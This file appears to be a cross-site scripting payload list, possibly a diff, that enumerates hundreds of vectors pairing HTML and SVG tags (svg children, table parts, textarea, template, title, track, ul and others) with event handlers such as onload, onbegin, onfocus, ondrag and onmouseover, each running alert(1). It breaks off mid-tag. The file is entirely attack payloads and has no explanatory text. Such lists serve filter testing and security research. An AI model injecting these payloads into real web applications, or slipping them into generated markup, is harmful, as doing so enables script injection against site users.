+<svg><audio onload=alert(1)></audio> +<svg><b onload=alert(1)></b> +<svg><base onload=alert(1)></base> +<svg><basefont onload=alert(1)></basefont> +<svg><bdi onload=alert(1)></bdi> +<svg><bdo onload=alert(1)></bdo> +<svg><bgsound onload=alert(1)></bgsound> +<svg><big onload=alert(1)></big> +<svg><blink onload=alert(1)></blink> +<svg><blockquote onload=alert(1)></blockquote> +<svg><br onload=alert(1)></br> +<svg><button onload=alert(1)></button> +<svg><canvas onload=alert(1)></canvas> +<svg><caption onload=alert(1)></caption> 
+<svg><center onload=alert(1)></center> +<svg><cite onload=alert(1)></cite> +<svg><code onload=alert(1)></code> +<svg><col onload=alert(1)></col> +<svg><colgroup onload=alert(1)></colgroup> +<svg><command onload=alert(1)></command> +<svg><content onload=alert(1)></content> +<svg><data onload=alert(1)></data> +<svg><datalist onload=alert(1)></datalist> +<svg><dd onload=alert(1)></dd> +<svg><del onload=alert(1)></del> +<svg><details onload=alert(1)></details> +<svg><dfn onload=alert(1)></dfn> +<svg><dialog onload=alert(1)></dialog> +<svg><dir onload=alert(1)></dir> +<svg><discard onbegin=alert(1)> +<svg><div onload=alert(1)></div> +<svg><dl onload=alert(1)></dl> +<svg><dt onload=alert(1)></dt> +<svg><element onload=alert(1)></element> +<svg><em onload=alert(1)></em> +<svg><fieldset onload=alert(1)></fieldset> +<svg><figcaption onload=alert(1)></figcaption> +<svg><figure onload=alert(1)></figure> +<svg><font onload=alert(1)></font> +<svg><footer onload=alert(1)></footer> +<svg><form onload=alert(1)></form> +<svg><frameset onload=alert(1)></frameset> +<svg><h1 onload=alert(1)></h1> +<svg><head onload=alert(1)></head> +<svg><header onload=alert(1)></header> +<svg><hgroup onload=alert(1)></hgroup> +<svg><hr onload=alert(1)></hr> +<svg><html onload=alert(1)></html> +<svg><i onload=alert(1)></i> +<svg><image href=1 onerror=alert(1)> +<svg><image href=validimage.png onload=alert(1)> +<svg><ins onload=alert(1)></ins> +<svg><kbd onload=alert(1)></kbd> +<svg><keygen onload=alert(1)></keygen> +<svg><label onload=alert(1)></label> +<svg><legend onload=alert(1)></legend> +<svg><li onload=alert(1)></li> +<svg><listing onload=alert(1)></listing> +<svg><main onload=alert(1)></main> +<svg><map onload=alert(1)></map> +<svg><mark onload=alert(1)></mark> +<svg><marquee onload=alert(1)></marquee> +<svg><menu onload=alert(1)></menu> +<svg><menuitem onload=alert(1)></menuitem> +<svg><meta onload=alert(1)></meta> +<svg><meter onload=alert(1)></meter> +<svg><multicol 
onload=alert(1)></multicol> +<svg><nav onload=alert(1)></nav> +<svg><nextid onload=alert(1)></nextid> +<svg><nobr onload=alert(1)></nobr> +<svg><noembed onload=alert(1)></noembed> +<svg><noframes onload=alert(1)></noframes> +<svg><noscript onload=alert(1)></noscript> +<svg><ol onload=alert(1)></ol> +<svg><optgroup onload=alert(1)></optgroup> +<svg><option onload=alert(1)></option> +<svg><output onload=alert(1)></output> +<svg><p onload=alert(1)></p> +<svg><param onload=alert(1)></param> +<svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1"> +<svg><path><animateMotion onend=alert(1) dur=1s repeatCount=1> +<svg><path><animateMotion onrepeat=alert(1) dur="1s" repeatCount="2"> +<svg><picture onload=alert(1)></picture> +<svg><plaintext onload=alert(1)></plaintext> +<svg><pre onload=alert(1)></pre> +<svg><progress onload=alert(1)></progress> +<svg><q onload=alert(1)></q> +<svg><rb onload=alert(1)></rb> +<svg><rp onload=alert(1)></rp> +<svg><rt onload=alert(1)></rt> +<svg><rtc onload=alert(1)></rtc> +<svg><ruby onload=alert(1)></ruby> +<svg><s onload=alert(1)></s> +<svg><samp onload=alert(1)></samp> +<svg><section onload=alert(1)></section> +<svg><select onload=alert(1)></select> +<svg><set onbegin=alert(1) attributename=x dur=1s> +<svg><set onend=alert(1) attributename=x dur=1s> +<svg><set onrepeat=alert(1) attributename=x dur=1s repeatcount=2> +<svg><shadow onload=alert(1)></shadow> +<svg><slot onload=alert(1)></slot> +<svg><small onload=alert(1)></small> +<svg><source onload=alert(1)></source> +<svg><spacer onload=alert(1)></spacer> +<svg><span onload=alert(1)></span> +<svg><strike onload=alert(1)></strike> +<svg><strong onload=alert(1)></strong> +<svg><sub onload=alert(1)></sub> +<svg><summary onload=alert(1)></summary> +<svg><sup onload=alert(1)></sup> +<svg><table onload=alert(1)></table> +<svg><tbody onload=alert(1)></tbody> +<svg><td onload=alert(1)></td> +<svg><template onload=alert(1)></template> +<svg><textarea onload=alert(1)></textarea> 
+<svg><tfoot onload=alert(1)></tfoot> +<svg><th onload=alert(1)></th> +<svg><thead onload=alert(1)></thead> +<svg><time onload=alert(1)></time> +<svg><title onload=alert(1)></title> +<svg><tr onload=alert(1)></tr> +<svg><tt onload=alert(1)></tt> +<svg><u onload=alert(1)></u> +<svg><ul onload=alert(1)></ul> +<svg><var onload=alert(1)></var> +<svg><video onload=alert(1)></video> +<svg><wbr onload=alert(1)></wbr> +<svg><xmp onload=alert(1)></xmp> +<svg><xss onload=alert(1)></xss> +<table draggable="true" ondrag="alert(1)">test</table> +<table draggable="true" ondragend="alert(1)">test</table> +<table draggable="true" ondragenter="alert(1)">test</table> +<table draggable="true" ondragleave="alert(1)">test</table> +<table draggable="true" ondragstart="alert(1)">test</table> +<table id=x tabindex=1 onactivate=alert(1)></table> +<table id=x tabindex=1 onbeforeactivate=alert(1)></table> +<table id=x tabindex=1 onbeforedeactivate=alert(1)></table><input autofocus> +<table id=x tabindex=1 ondeactivate=alert(1)></table><input id=y autofocus> +<table id=x tabindex=1 onfocus=alert(1)></table> +<table id=x tabindex=1 onfocusin=alert(1)></table> +<table onbeforecopy="alert(1)" contenteditable>test</table> +<table onbeforecut="alert(1)" contenteditable>test</table> +<table onbeforepaste="alert(1)" contenteditable>test</table> +<table onblur=alert(1) tabindex=1 id=x></table><input autofocus> +<table onclick="alert(1)">test</table> +<table oncontextmenu="alert(1)">test</table> +<table oncopy="alert(1)" contenteditable>test</table> +<table oncut="alert(1)" contenteditable>test</table> +<table ondblclick="alert(1)">test</table> +<table onfocusout=alert(1) tabindex=1 id=x></table><input autofocus> +<table onkeydown="alert(1)" contenteditable>test</table> +<table onkeypress="alert(1)" contenteditable>test</table> +<table onkeyup="alert(1)" contenteditable>test</table> +<table onmousedown="alert(1)">test</table> +<table onmouseenter="alert(1)">test</table> +<table 
onmouseleave="alert(1)">test</table> +<table onmousemove="alert(1)">test</table> +<table onmouseout="alert(1)">test</table> +<table onmouseover="alert(1)">test</table> +<table onmouseup="alert(1)">test</table> +<table onpaste="alert(1)" contenteditable>test</table> +<tbody draggable="true" ondrag="alert(1)">test</tbody> +<tbody draggable="true" ondragend="alert(1)">test</tbody> +<tbody draggable="true" ondragenter="alert(1)">test</tbody> +<tbody draggable="true" ondragleave="alert(1)">test</tbody> +<tbody draggable="true" ondragstart="alert(1)">test</tbody> +<tbody id=x tabindex=1 onactivate=alert(1)></tbody> +<tbody id=x tabindex=1 onbeforeactivate=alert(1)></tbody> +<tbody id=x tabindex=1 onbeforedeactivate=alert(1)></tbody><input autofocus> +<tbody id=x tabindex=1 ondeactivate=alert(1)></tbody><input id=y autofocus> +<tbody id=x tabindex=1 onfocus=alert(1)></tbody> +<tbody id=x tabindex=1 onfocusin=alert(1)></tbody> +<tbody onbeforecopy="alert(1)" contenteditable>test</tbody> +<tbody onbeforecut="alert(1)" contenteditable>test</tbody> +<tbody onbeforepaste="alert(1)" contenteditable>test</tbody> +<tbody onblur=alert(1) tabindex=1 id=x></tbody><input autofocus> +<tbody onclick="alert(1)">test</tbody> +<tbody oncontextmenu="alert(1)">test</tbody> +<tbody oncopy="alert(1)" contenteditable>test</tbody> +<tbody oncut="alert(1)" contenteditable>test</tbody> +<tbody ondblclick="alert(1)">test</tbody> +<tbody onfocusout=alert(1) tabindex=1 id=x></tbody><input autofocus> +<tbody onkeydown="alert(1)" contenteditable>test</tbody> +<tbody onkeypress="alert(1)" contenteditable>test</tbody> +<tbody onkeyup="alert(1)" contenteditable>test</tbody> +<tbody onmousedown="alert(1)">test</tbody> +<tbody onmouseenter="alert(1)">test</tbody> +<tbody onmouseleave="alert(1)">test</tbody> +<tbody onmousemove="alert(1)">test</tbody> +<tbody onmouseout="alert(1)">test</tbody> +<tbody onmouseover="alert(1)">test</tbody> +<tbody onmouseup="alert(1)">test</tbody> +<tbody onpaste="alert(1)" 
contenteditable>test</tbody> +<td draggable="true" ondrag="alert(1)">test</td> +<td draggable="true" ondragend="alert(1)">test</td> +<td draggable="true" ondragenter="alert(1)">test</td> +<td draggable="true" ondragleave="alert(1)">test</td> +<td draggable="true" ondragstart="alert(1)">test</td> +<td id=x tabindex=1 onactivate=alert(1)></td> +<td id=x tabindex=1 onbeforeactivate=alert(1)></td> +<td id=x tabindex=1 onbeforedeactivate=alert(1)></td><input autofocus> +<td id=x tabindex=1 ondeactivate=alert(1)></td><input id=y autofocus> +<td id=x tabindex=1 onfocus=alert(1)></td> +<td id=x tabindex=1 onfocusin=alert(1)></td> +<td onbeforecopy="alert(1)" contenteditable>test</td> +<td onbeforecut="alert(1)" contenteditable>test</td> +<td onbeforepaste="alert(1)" contenteditable>test</td> +<td onblur=alert(1) tabindex=1 id=x></td><input autofocus> +<td onclick="alert(1)">test</td> +<td oncontextmenu="alert(1)">test</td> +<td oncopy="alert(1)" contenteditable>test</td> +<td oncut="alert(1)" contenteditable>test</td> +<td ondblclick="alert(1)">test</td> +<td onfocusout=alert(1) tabindex=1 id=x></td><input autofocus> +<td onkeydown="alert(1)" contenteditable>test</td> +<td onkeypress="alert(1)" contenteditable>test</td> +<td onkeyup="alert(1)" contenteditable>test</td> +<td onmousedown="alert(1)">test</td> +<td onmouseenter="alert(1)">test</td> +<td onmouseleave="alert(1)">test</td> +<td onmousemove="alert(1)">test</td> +<td onmouseout="alert(1)">test</td> +<td onmouseover="alert(1)">test</td> +<td onmouseup="alert(1)">test</td> +<td onpaste="alert(1)" contenteditable>test</td> +<template draggable="true" ondrag="alert(1)">test</template> +<template draggable="true" ondragend="alert(1)">test</template> +<template draggable="true" ondragenter="alert(1)">test</template> +<template draggable="true" ondragleave="alert(1)">test</template> +<template draggable="true" ondragstart="alert(1)">test</template> +<template id=x tabindex=1 onactivate=alert(1)></template> +<template id=x 
tabindex=1 onbeforeactivate=alert(1)></template> +<template id=x tabindex=1 onbeforedeactivate=alert(1)></template><input autofocus> +<template id=x tabindex=1 ondeactivate=alert(1)></template><input id=y autofocus> +<template id=x tabindex=1 onfocus=alert(1)></template> +<template id=x tabindex=1 onfocusin=alert(1)></template> +<template onbeforecopy="alert(1)" contenteditable>test</template> +<template onbeforecut="alert(1)" contenteditable>test</template> +<template onbeforepaste="alert(1)" contenteditable>test</template> +<template onblur=alert(1) tabindex=1 id=x></template><input autofocus> +<template onclick="alert(1)">test</template> +<template oncontextmenu="alert(1)">test</template> +<template oncopy="alert(1)" contenteditable>test</template> +<template oncut="alert(1)" contenteditable>test</template> +<template ondblclick="alert(1)">test</template> +<template onfocusout=alert(1) tabindex=1 id=x></template><input autofocus> +<template onkeydown="alert(1)" contenteditable>test</template> +<template onkeypress="alert(1)" contenteditable>test</template> +<template onkeyup="alert(1)" contenteditable>test</template> +<template onmousedown="alert(1)">test</template> +<template onmouseenter="alert(1)">test</template> +<template onmouseleave="alert(1)">test</template> +<template onmousemove="alert(1)">test</template> +<template onmouseout="alert(1)">test</template> +<template onmouseover="alert(1)">test</template> +<template onmouseup="alert(1)">test</template> +<template onpaste="alert(1)" contenteditable>test</template> +<textarea autofocus onfocus=alert(1)>test</textarea> +<textarea autofocus onfocusin=alert(1)>test</textarea> +<textarea draggable="true" ondrag="alert(1)">test</textarea> +<textarea draggable="true" ondragend="alert(1)">test</textarea> +<textarea draggable="true" ondragenter="alert(1)">test</textarea> +<textarea draggable="true" ondragleave="alert(1)">test</textarea> +<textarea draggable="true" ondragstart="alert(1)">test</textarea> +<textarea 
id=x tabindex=1 onactivate=alert(1)></textarea> +<textarea id=x tabindex=1 onbeforeactivate=alert(1)></textarea> +<textarea id=x tabindex=1 onbeforedeactivate=alert(1)></textarea><input autofocus> +<textarea id=x tabindex=1 ondeactivate=alert(1)></textarea><input id=y autofocus> +<textarea onauxclick=alert(1)>XSS</textarea> +<textarea onbeforecopy=alert(1) autofocus>XSS</textarea> +<textarea onbeforecut=alert(1) autofocus>XSS</textarea> +<textarea onbeforepaste=alert(1) autofocus></textarea> +<textarea onblur=alert(1) id=x></textarea><input autofocus> +<textarea onchange=alert(1)>XSS</textarea> +<textarea onclick="alert(1)">test</textarea> +<textarea oncontextmenu="alert(1)">test</textarea> +<textarea oncopy=alert(1) autofocus>XSS</textarea> +<textarea oncut=alert(1) autofocus>XSS</textarea> +<textarea ondblclick="alert(1)">test</textarea> +<textarea onfocusout=alert(1) id=x></textarea><input autofocus> +<textarea oninput=alert(1)>XSS</textarea> +<textarea onkeydown="alert(1)" contenteditable>test</textarea> +<textarea onkeypress="alert(1)" contenteditable>test</textarea> +<textarea onkeyup="alert(1)" contenteditable>test</textarea> +<textarea onmousedown="alert(1)">test</textarea> +<textarea onmouseenter="alert(1)">test</textarea> +<textarea onmouseleave="alert(1)">test</textarea> +<textarea onmousemove="alert(1)">test</textarea> +<textarea onmouseout="alert(1)">test</textarea> +<textarea onmouseover="alert(1)">test</textarea> +<textarea onmouseup="alert(1)">test</textarea> +<textarea onpaste=alert(1) autofocus></textarea> +<textarea onselect=alert(1) autofocus>XSS</textarea> +<tfoot draggable="true" ondrag="alert(1)">test</tfoot> +<tfoot draggable="true" ondragend="alert(1)">test</tfoot> +<tfoot draggable="true" ondragenter="alert(1)">test</tfoot> +<tfoot draggable="true" ondragleave="alert(1)">test</tfoot> +<tfoot draggable="true" ondragstart="alert(1)">test</tfoot> +<tfoot id=x tabindex=1 onactivate=alert(1)></tfoot> +<tfoot id=x tabindex=1 
onbeforeactivate=alert(1)></tfoot> +<tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus> +<tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus> +<tfoot id=x tabindex=1 onfocus=alert(1)></tfoot> +<tfoot id=x tabindex=1 onfocusin=alert(1)></tfoot> +<tfoot onbeforecopy="alert(1)" contenteditable>test</tfoot> +<tfoot onbeforecut="alert(1)" contenteditable>test</tfoot> +<tfoot onbeforepaste="alert(1)" contenteditable>test</tfoot> +<tfoot onblur=alert(1) tabindex=1 id=x></tfoot><input autofocus> +<tfoot onclick="alert(1)">test</tfoot> +<tfoot oncontextmenu="alert(1)">test</tfoot> +<tfoot oncopy="alert(1)" contenteditable>test</tfoot> +<tfoot oncut="alert(1)" contenteditable>test</tfoot> +<tfoot ondblclick="alert(1)">test</tfoot> +<tfoot onfocusout=alert(1) tabindex=1 id=x></tfoot><input autofocus> +<tfoot onkeydown="alert(1)" contenteditable>test</tfoot> +<tfoot onkeypress="alert(1)" contenteditable>test</tfoot> +<tfoot onkeyup="alert(1)" contenteditable>test</tfoot> +<tfoot onmousedown="alert(1)">test</tfoot> +<tfoot onmouseenter="alert(1)">test</tfoot> +<tfoot onmouseleave="alert(1)">test</tfoot> +<tfoot onmousemove="alert(1)">test</tfoot> +<tfoot onmouseout="alert(1)">test</tfoot> +<tfoot onmouseover="alert(1)">test</tfoot> +<tfoot onmouseup="alert(1)">test</tfoot> +<tfoot onpaste="alert(1)" contenteditable>test</tfoot> +<th draggable="true" ondrag="alert(1)">test</th> +<th draggable="true" ondragend="alert(1)">test</th> +<th draggable="true" ondragenter="alert(1)">test</th> +<th draggable="true" ondragleave="alert(1)">test</th> +<th draggable="true" ondragstart="alert(1)">test</th> +<th id=x tabindex=1 onactivate=alert(1)></th> +<th id=x tabindex=1 onbeforeactivate=alert(1)></th> +<th id=x tabindex=1 onbeforedeactivate=alert(1)></th><input autofocus> +<th id=x tabindex=1 ondeactivate=alert(1)></th><input id=y autofocus> +<th id=x tabindex=1 onfocus=alert(1)></th> +<th id=x tabindex=1 onfocusin=alert(1)></th> +<th 
onbeforecopy="alert(1)" contenteditable>test</th> +<th onbeforecut="alert(1)" contenteditable>test</th> +<th onbeforepaste="alert(1)" contenteditable>test</th> +<th onblur=alert(1) tabindex=1 id=x></th><input autofocus> +<th onclick="alert(1)">test</th> +<th oncontextmenu="alert(1)">test</th> +<th oncopy="alert(1)" contenteditable>test</th> +<th oncut="alert(1)" contenteditable>test</th> +<th ondblclick="alert(1)">test</th> +<th onfocusout=alert(1) tabindex=1 id=x></th><input autofocus> +<th onkeydown="alert(1)" contenteditable>test</th> +<th onkeypress="alert(1)" contenteditable>test</th> +<th onkeyup="alert(1)" contenteditable>test</th> +<th onmousedown="alert(1)">test</th> +<th onmouseenter="alert(1)">test</th> +<th onmouseleave="alert(1)">test</th> +<th onmousemove="alert(1)">test</th> +<th onmouseout="alert(1)">test</th> +<th onmouseover="alert(1)">test</th> +<th onmouseup="alert(1)">test</th> +<th onpaste="alert(1)" contenteditable>test</th> +<thead draggable="true" ondrag="alert(1)">test</thead> +<thead draggable="true" ondragend="alert(1)">test</thead> +<thead draggable="true" ondragenter="alert(1)">test</thead> +<thead draggable="true" ondragleave="alert(1)">test</thead> +<thead draggable="true" ondragstart="alert(1)">test</thead> +<thead id=x tabindex=1 onactivate=alert(1)></thead> +<thead id=x tabindex=1 onbeforeactivate=alert(1)></thead> +<thead id=x tabindex=1 onbeforedeactivate=alert(1)></thead><input autofocus> +<thead id=x tabindex=1 ondeactivate=alert(1)></thead><input id=y autofocus> +<thead id=x tabindex=1 onfocus=alert(1)></thead> +<thead id=x tabindex=1 onfocusin=alert(1)></thead> +<thead onbeforecopy="alert(1)" contenteditable>test</thead> +<thead onbeforecut="alert(1)" contenteditable>test</thead> +<thead onbeforepaste="alert(1)" contenteditable>test</thead> +<thead onblur=alert(1) tabindex=1 id=x></thead><input autofocus> +<thead onclick="alert(1)">test</thead> +<thead oncontextmenu="alert(1)">test</thead> +<thead oncopy="alert(1)" 
contenteditable>test</thead> +<thead oncut="alert(1)" contenteditable>test</thead> +<thead ondblclick="alert(1)">test</thead> +<thead onfocusout=alert(1) tabindex=1 id=x></thead><input autofocus> +<thead onkeydown="alert(1)" contenteditable>test</thead> +<thead onkeypress="alert(1)" contenteditable>test</thead> +<thead onkeyup="alert(1)" contenteditable>test</thead> +<thead onmousedown="alert(1)">test</thead> +<thead onmouseenter="alert(1)">test</thead> +<thead onmouseleave="alert(1)">test</thead> +<thead onmousemove="alert(1)">test</thead> +<thead onmouseout="alert(1)">test</thead> +<thead onmouseover="alert(1)">test</thead> +<thead onmouseup="alert(1)">test</thead> +<thead onpaste="alert(1)" contenteditable>test</thead> +<time draggable="true" ondrag="alert(1)">test</time> +<time draggable="true" ondragend="alert(1)">test</time> +<time draggable="true" ondragenter="alert(1)">test</time> +<time draggable="true" ondragleave="alert(1)">test</time> +<time draggable="true" ondragstart="alert(1)">test</time> +<time id=x tabindex=1 onactivate=alert(1)></time> +<time id=x tabindex=1 onbeforeactivate=alert(1)></time> +<time id=x tabindex=1 onbeforedeactivate=alert(1)></time><input autofocus> +<time id=x tabindex=1 ondeactivate=alert(1)></time><input id=y autofocus> +<time id=x tabindex=1 onfocus=alert(1)></time> +<time id=x tabindex=1 onfocusin=alert(1)></time> +<time onbeforecopy="alert(1)" contenteditable>test</time> +<time onbeforecut="alert(1)" contenteditable>test</time> +<time onbeforepaste="alert(1)" contenteditable>test</time> +<time onblur=alert(1) tabindex=1 id=x></time><input autofocus> +<time onclick="alert(1)">test</time> +<time oncontextmenu="alert(1)">test</time> +<time oncopy="alert(1)" contenteditable>test</time> +<time oncut="alert(1)" contenteditable>test</time> +<time ondblclick="alert(1)">test</time> +<time onfocusout=alert(1) tabindex=1 id=x></time><input autofocus> +<time onkeydown="alert(1)" contenteditable>test</time> +<time onkeypress="alert(1)" 
contenteditable>test</time> +<time onkeyup="alert(1)" contenteditable>test</time> +<time onmousedown="alert(1)">test</time> +<time onmouseenter="alert(1)">test</time> +<time onmouseleave="alert(1)">test</time> +<time onmousemove="alert(1)">test</time> +<time onmouseout="alert(1)">test</time> +<time onmouseover="alert(1)">test</time> +<time onmouseup="alert(1)">test</time> +<time onpaste="alert(1)" contenteditable>test</time> +<title draggable="true" ondrag="alert(1)">test</title> +<title draggable="true" ondragend="alert(1)">test</title> +<title draggable="true" ondragenter="alert(1)">test</title> +<title draggable="true" ondragleave="alert(1)">test</title> +<title draggable="true" ondragstart="alert(1)">test</title> +<title id=x tabindex=1 onactivate=alert(1)></title> +<title id=x tabindex=1 onbeforeactivate=alert(1)></title> +<title id=x tabindex=1 onbeforedeactivate=alert(1)></title><input autofocus> +<title id=x tabindex=1 ondeactivate=alert(1)></title><input id=y autofocus> +<title id=x tabindex=1 onfocus=alert(1)></title> +<title id=x tabindex=1 onfocusin=alert(1)></title> +<title onbeforecopy="alert(1)" contenteditable>test</title> +<title onbeforecut="alert(1)" contenteditable>test</title> +<title onbeforepaste="alert(1)" contenteditable>test</title> +<title onblur=alert(1) tabindex=1 id=x></title><input autofocus> +<title onclick="alert(1)">test</title> +<title oncontextmenu="alert(1)">test</title> +<title oncopy="alert(1)" contenteditable>test</title> +<title oncut="alert(1)" contenteditable>test</title> +<title ondblclick="alert(1)">test</title> +<title onfocusout=alert(1) tabindex=1 id=x></title><input autofocus> +<title onkeydown="alert(1)" contenteditable>test</title> +<title onkeypress="alert(1)" contenteditable>test</title> +<title onkeyup="alert(1)" contenteditable>test</title> +<title onmousedown="alert(1)">test</title> +<title onmouseenter="alert(1)">test</title> +<title onmouseleave="alert(1)">test</title> +<title 
onmousemove="alert(1)">test</title> +<title onmouseout="alert(1)">test</title> +<title onmouseover="alert(1)">test</title> +<title onmouseup="alert(1)">test</title> +<title onpaste="alert(1)" contenteditable>test</title> +<tr draggable="true" ondrag="alert(1)">test</tr> +<tr draggable="true" ondragend="alert(1)">test</tr> +<tr draggable="true" ondragenter="alert(1)">test</tr> +<tr draggable="true" ondragleave="alert(1)">test</tr> +<tr draggable="true" ondragstart="alert(1)">test</tr> +<tr id=x tabindex=1 onactivate=alert(1)></tr> +<tr id=x tabindex=1 onbeforeactivate=alert(1)></tr> +<tr id=x tabindex=1 onbeforedeactivate=alert(1)></tr><input autofocus> +<tr id=x tabindex=1 ondeactivate=alert(1)></tr><input id=y autofocus> +<tr id=x tabindex=1 onfocus=alert(1)></tr> +<tr id=x tabindex=1 onfocusin=alert(1)></tr> +<tr onbeforecopy="alert(1)" contenteditable>test</tr> +<tr onbeforecut="alert(1)" contenteditable>test</tr> +<tr onbeforepaste="alert(1)" contenteditable>test</tr> +<tr onblur=alert(1) tabindex=1 id=x></tr><input autofocus> +<tr onclick="alert(1)">test</tr> +<tr oncontextmenu="alert(1)">test</tr> +<tr oncopy="alert(1)" contenteditable>test</tr> +<tr oncut="alert(1)" contenteditable>test</tr> +<tr ondblclick="alert(1)">test</tr> +<tr onfocusout=alert(1) tabindex=1 id=x></tr><input autofocus> +<tr onkeydown="alert(1)" contenteditable>test</tr> +<tr onkeypress="alert(1)" contenteditable>test</tr> +<tr onkeyup="alert(1)" contenteditable>test</tr> +<tr onmousedown="alert(1)">test</tr> +<tr onmouseenter="alert(1)">test</tr> +<tr onmouseleave="alert(1)">test</tr> +<tr onmousemove="alert(1)">test</tr> +<tr onmouseout="alert(1)">test</tr> +<tr onmouseover="alert(1)">test</tr> +<tr onmouseup="alert(1)">test</tr> +<tr onpaste="alert(1)" contenteditable>test</tr> +<track draggable="true" ondrag="alert(1)">test</track> +<track draggable="true" ondragend="alert(1)">test</track> +<track draggable="true" ondragenter="alert(1)">test</track> +<track draggable="true" 
ondragleave="alert(1)">test</track> +<track draggable="true" ondragstart="alert(1)">test</track> +<track id=x tabindex=1 onactivate=alert(1)></track> +<track id=x tabindex=1 onbeforeactivate=alert(1)></track> +<track id=x tabindex=1 onbeforedeactivate=alert(1)></track><input autofocus> +<track id=x tabindex=1 ondeactivate=alert(1)></track><input id=y autofocus> +<track id=x tabindex=1 onfocus=alert(1)></track> +<track id=x tabindex=1 onfocusin=alert(1)></track> +<track onbeforecopy="alert(1)" contenteditable>test</track> +<track onbeforecut="alert(1)" contenteditable>test</track> +<track onbeforepaste="alert(1)" contenteditable>test</track> +<track onblur=alert(1) tabindex=1 id=x></track><input autofocus> +<track onclick="alert(1)">test</track> +<track oncontextmenu="alert(1)">test</track> +<track oncopy="alert(1)" contenteditable>test</track> +<track oncut="alert(1)" contenteditable>test</track> +<track ondblclick="alert(1)">test</track> +<track onfocusout=alert(1) tabindex=1 id=x></track><input autofocus> +<track onkeydown="alert(1)" contenteditable>test</track> +<track onkeypress="alert(1)" contenteditable>test</track> +<track onkeyup="alert(1)" contenteditable>test</track> +<track onmousedown="alert(1)">test</track> +<track onmouseenter="alert(1)">test</track> +<track onmouseleave="alert(1)">test</track> +<track onmousemove="alert(1)">test</track> +<track onmouseout="alert(1)">test</track> +<track onmouseover="alert(1)">test</track> +<track onmouseup="alert(1)">test</track> +<track onpaste="alert(1)" contenteditable>test</track> +<tt draggable="true" ondrag="alert(1)">test</tt> +<tt draggable="true" ondragend="alert(1)">test</tt> +<tt draggable="true" ondragenter="alert(1)">test</tt> +<tt draggable="true" ondragleave="alert(1)">test</tt> +<tt draggable="true" ondragstart="alert(1)">test</tt> +<tt id=x tabindex=1 onactivate=alert(1)></tt> +<tt id=x tabindex=1 onbeforeactivate=alert(1)></tt> +<tt id=x tabindex=1 onbeforedeactivate=alert(1)></tt><input autofocus> 
+<tt id=x tabindex=1 ondeactivate=alert(1)></tt><input id=y autofocus> +<tt id=x tabindex=1 onfocus=alert(1)></tt> +<tt id=x tabindex=1 onfocusin=alert(1)></tt> +<tt onbeforecopy="alert(1)" contenteditable>test</tt> +<tt onbeforecut="alert(1)" contenteditable>test</tt> +<tt onbeforepaste="alert(1)" contenteditable>test</tt> +<tt onblur=alert(1) tabindex=1 id=x></tt><input autofocus> +<tt onclick="alert(1)">test</tt> +<tt oncontextmenu="alert(1)">test</tt> +<tt oncopy="alert(1)" contenteditable>test</tt> +<tt oncut="alert(1)" contenteditable>test</tt> +<tt ondblclick="alert(1)">test</tt> +<tt onfocusout=alert(1) tabindex=1 id=x></tt><input autofocus> +<tt onkeydown="alert(1)" contenteditable>test</tt> +<tt onkeypress="alert(1)" contenteditable>test</tt> +<tt onkeyup="alert(1)" contenteditable>test</tt> +<tt onmousedown="alert(1)">test</tt> +<tt onmouseenter="alert(1)">test</tt> +<tt onmouseleave="alert(1)">test</tt> +<tt onmousemove="alert(1)">test</tt> +<tt onmouseout="alert(1)">test</tt> +<tt onmouseover="alert(1)">test</tt> +<tt onmouseup="alert(1)">test</tt> +<tt onpaste="alert(1)" contenteditable>test</tt> +<u draggable="true" ondrag="alert(1)">test</u> +<u draggable="true" ondragend="alert(1)">test</u> +<u draggable="true" ondragenter="alert(1)">test</u> +<u draggable="true" ondragleave="alert(1)">test</u> +<u draggable="true" ondragstart="alert(1)">test</u> +<u id=x tabindex=1 onactivate=alert(1)></u> +<u id=x tabindex=1 onbeforeactivate=alert(1)></u> +<u id=x tabindex=1 onbeforedeactivate=alert(1)></u><input autofocus> +<u id=x tabindex=1 ondeactivate=alert(1)></u><input id=y autofocus> +<u id=x tabindex=1 onfocus=alert(1)></u> +<u id=x tabindex=1 onfocusin=alert(1)></u> +<u onbeforecopy="alert(1)" contenteditable>test</u> +<u onbeforecut="alert(1)" contenteditable>test</u> +<u onbeforepaste="alert(1)" contenteditable>test</u> +<u onblur=alert(1) tabindex=1 id=x></u><input autofocus> +<u onclick="alert(1)">test</u> +<u oncontextmenu="alert(1)">test</u> +<u 
oncopy="alert(1)" contenteditable>test</u> +<u oncut="alert(1)" contenteditable>test</u> +<u ondblclick="alert(1)">test</u> +<u onfocusout=alert(1) tabindex=1 id=x></u><input autofocus> +<u onkeydown="alert(1)" contenteditable>test</u> +<u onkeypress="alert(1)" contenteditable>test</u> +<u onkeyup="alert(1)" contenteditable>test</u> +<u onmousedown="alert(1)">test</u> +<u onmouseenter="alert(1)">test</u> +<u onmouseleave="alert(1)">test</u> +<u onmousemove="alert(1)">test</u> +<u onmouseout="alert(1)">test</u> +<u onmouseover="alert(1)">test</u> +<u onmouseup="alert(1)">test</u> +<u onpaste="alert(1)" contenteditable>test</u> +<ul draggable="true" ondrag="alert(1)">test</ul> +<ul draggable="true" ondragend="alert(1)">test</ul> +<ul draggable="true" ondragenter="alert(1)">test</ul> +<ul draggable="true" ondragleave="alert(1)">test</ul> +<ul draggable="true" ondragstart="alert(1)">test</ul> +<ul id=x tabindex=1 onactivate=alert(1)></ul> +<ul id=x tabindex=1 onbeforeactivate=alert(1)></ul> +<ul id=x tabindex=1 onbeforedeactivate=alert(1)></ul><input autofocus> +<ul id=x tabindex=1 ondeactivate=alert(1)></ul><input id=y autofocus> +<ul id=x tabindex=1 onfocus=alert(1)></ul> +<ul id=x tabindex=1 onfocusin=alert(1)></ul> +<ul onbeforecopy="alert(1)" contenteditable>test</ul> +<ul onbeforecut="alert(1)" contenteditable>test</ul> +<ul onbeforepaste="alert(1)" contenteditable>test</ul> +<ul onblur=alert(1) tabindex=1 id=x></ul><input autofocus> +<ul onclick="alert(1)">test</ul> +<ul oncontextmenu="alert(1)">test</ul> +<ul oncopy="alert(1)" contenteditable>test</ul> +<ul oncut="alert(1)" contenteditable>test</ul> +<ul ondblclick="alert(1)">test</ul> +<ul onfocusout=alert(1) tabindex=1 id=x></ul><input autofocus> +<ul onkeydown="alert(1)" contenteditable>test</ul> +<ul onkeypress="alert(1)" contenteditable>test</ul> +<ul onkeyup="alert(1)" contenteditable>test</ul> +<ul 